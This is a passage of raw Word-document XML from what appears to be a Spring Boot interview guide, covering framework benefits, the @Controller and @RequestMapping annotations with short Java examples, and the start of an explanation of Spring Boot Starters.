    <w:p w14:paraId="636B7AD4" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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duces repetitive code and configuration, making development faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D53F846" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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llows convention over configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0968666E" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F45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2494EA">
          <v:rect id="_x0000_i2479" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="052E4B01" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553" w:rsidP="005F455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6. Easy Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C000BF3" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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sily integrates with Spring ecosystem (Spring Data, Spring Security, Spring Cloud, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D75806" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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orks seamlessly with external tools like Docker, Kubernetes, and cloud platforms (AWS, GCP, Azure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4858A37D" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F45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1719BAB">
          <v:rect id="_x0000_i2480" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B84CCED" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553" w:rsidP="005F455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7. CLI Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B663C3" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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Boot CLI allows you to run and test Groovy/Java apps from the command line — useful for quick prototyping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DE423" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F45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6DAD9D">
          <v:rect id="_x0000_i2481" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C60AAD" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553" w:rsidP="005F455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8. Rapid Development &amp; Microservices Friendly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59946CE2" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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erfect for microservices architecture with lightweight REST services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E21F25E" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27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eeds up development with built-in defaults and reduced setup time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675BD8F0" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F45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0AA263E">
          <v:rect id="_x0000_i2482" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="499E5264" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553" w:rsidP="005F455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9. Profiles &amp; Environment Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CBB30C" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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sily supports different environments (dev, test, prod) using application-{profile}.properties or YAML files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A0C2B3" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F45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A89F9EE">
          <v:rect id="_x0000_i2483" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="105A4A16" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553" w:rsidP="005F455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10. Active Community &amp; Documentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D8E79C" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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acked by a strong Spring community.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A3FAA" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="005F4553">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ell-documented and actively maintained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A91722" w14:textId="77777777" w:rsidR="005F4553" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005F45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A45FE66">
          <v:rect id="_x0000_i2484" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0704EFE3" w14:textId="36735C38" w:rsidR="00352F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="00352F3B" w:rsidP="00352F3B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="569" w:name="_Toc196308049"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the role of @Controller and @RequestMapping?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="569"/>
    </w:p>
    <w:p w14:paraId="6373791B" w14:textId="1F890B17" w:rsidR="00352F3B" w:rsidRPr="00CE4B95" w:rsidRDefault="00352F3B" w:rsidP="00352F3B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BF12FF" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="00320315">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Controller — Marks a class as a Spring MVC Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A48868B" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Tells Spring that this class will handle web requests (typically HTTP GET/POST).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5E6E64" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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in the presentation layer to define endpoints for incoming client requests (like /home, /users, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BDE1BE" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ED5DDF" w14:textId="77777777" w:rsidR="00C4092A" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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iew name (for traditional MVC with JSP/Thymeleaf), or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E49A18" w14:textId="1667CB42" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2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delAndView object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0996C2F2" w14:textId="77777777" w:rsidR="004D6E6A" w:rsidRPr="00CE4B95" w:rsidRDefault="004D6E6A" w:rsidP="00320315">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531C5B84" w14:textId="77777777" w:rsidR="004D6E6A" w:rsidRPr="00CE4B95" w:rsidRDefault="004D6E6A" w:rsidP="00320315">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40F85499" w14:textId="77C17116" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="0032031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232A85F6" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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080023"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3161E8D0" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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080023"/>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Controll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42D411E" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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080023"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2727CF4D" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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0800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RequestMapping</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ello"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4887AD" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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0800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ayHell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289D55C" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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0800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hell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View name (hello.jsp or hello.html)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCAF846" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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080023"/>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45B2DF9" w14:textId="51C2DDA0" w:rsidR="00320315" w:rsidRPr="00CE4B9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080023"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C11D21" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="0032031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you want to return JSON instead of a view, use @RestController (which is a shortcut for @Controller + @ResponseBody).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35873775" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0032031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4781C8C">
          <v:rect id="_x0000_i2485" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F674D63" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="0032031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equestMapping — Maps HTTP requests to handler methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59108630" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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be applied at the class level and/or method level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F8B441" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ps URL paths and HTTP methods (GET, POST, etc.) to specific controller methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65545466" w14:textId="0949E8F2" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="0032031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52EE851B" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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322765"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23753022" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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322765"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@RequestMapping</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p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Base path for all methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C43B3A" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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322765"/>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piControll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02106B9" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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322765"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0BBB33" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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32276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RequestMapping</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use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Handles GET /api/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3319851F" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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32276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getUse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514B7D2" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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32276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users"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DCF105" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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32276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307DA26" w14:textId="36826A5D" w:rsidR="00320315" w:rsidRPr="00CE4B9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322765"/>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12A3E19C" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="00320315">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You can also specify HTTP methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6980B04A" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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394869"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="006666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@RequestMapping</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valu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sav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etho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equestMetho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OST</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7F269" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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394869"/>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saveUs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B1B4C5C" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B9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39486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saved"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4713DB" w14:textId="4737E2F2" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="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394869"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC11FD" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="0032031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6"/>
        <w:gridCol w:w="4241"/>
      </w:tblGrid>
      <w:tr w:rsidR="00320315" w:rsidRPr="00CE4B95" w14:paraId="57304AB1" w14:textId="77777777" w:rsidTr="00320315">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="114B073B" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="006C5449">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nnotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066120B4" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="006C5449">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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00320315" w:rsidRPr="00CE4B95" w14:paraId="2981160F" w14:textId="77777777" w:rsidTr="00320315">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72AE5611" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="0032031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troller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2528CE5A" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="0032031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rks class to handle web requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00320315" w:rsidRPr="00CE4B95" w14:paraId="53FB2572" w14:textId="77777777" w:rsidTr="00320315">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5837FC3D" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="0032031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questMapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76D4923D" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00320315" w:rsidP="0032031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ps URLs (and methods) to handler methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64D866D8" w14:textId="77777777" w:rsidR="00320315" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0032031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42D87C9">
          <v:rect id="_x0000_i2486" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB35371" w14:textId="08A483DF" w:rsidR="00E53476" w:rsidRPr="00CE4B95" w:rsidRDefault="007060F4" w:rsidP="00E53476">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="570" w:name="_Toc196308050"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Spring Boot Starter</w:t>
      </w:r>
      <w:r w:rsidR="00E53476" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="570"/>
    </w:p>
    <w:p w14:paraId="757DA5BC" w14:textId="4B474CCE" w:rsidR="00C81C62" w:rsidRPr="00CE4B95" w:rsidRDefault="00C81C62" w:rsidP="00C23798">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Spring Boot Starter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pre-configured set of dependencies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that you can add to your project to get a specific functionality </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>quickly and easily</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
